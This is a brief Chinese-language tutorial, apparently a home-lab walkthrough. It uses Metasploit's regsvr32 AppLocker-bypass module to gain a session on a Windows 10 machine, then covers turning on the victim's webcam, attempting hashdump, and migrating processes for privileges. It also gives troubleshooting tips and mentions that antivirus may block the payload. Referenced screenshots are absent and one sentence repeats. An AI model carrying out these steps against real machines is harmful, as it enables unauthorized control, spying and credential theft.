目标机:win10 ip:192.168.1.8
攻击机:kali Linux ip:192.168.1.63
一:直接打开metasploit,也可在终端直接输入msfconsole
msf的用法:
查找web_delivery模块: search web_delivery
使用web_delivery模块:use exploit/windows/misc/regsvr32_applocker_bypass_server
查看端口及参数设置
设置本机ip:set LHOST ip;然后运行:exploit
在目标机上运行本机生成的 注册表语句如下图(这里可能会被360杀掉)
可以在攻击上看到传回来了session
输入sessions -i 2 即可控制目标机
打开摄像头
打来结果
用hashdump抓取密码:发现没有权限
可以通过msf迁移进程来提升权限
ps查看进程,migrate迁移进程
在与目标建立会话时有时后会出现no session;这里可能是msf的模块有问题,可以使用
reload_all来重新装模块,
也可能是软件版本太低,可以用msfupdate直接更新软件。
也可能是软件版本太低,可以用msfupdate直接更新软件。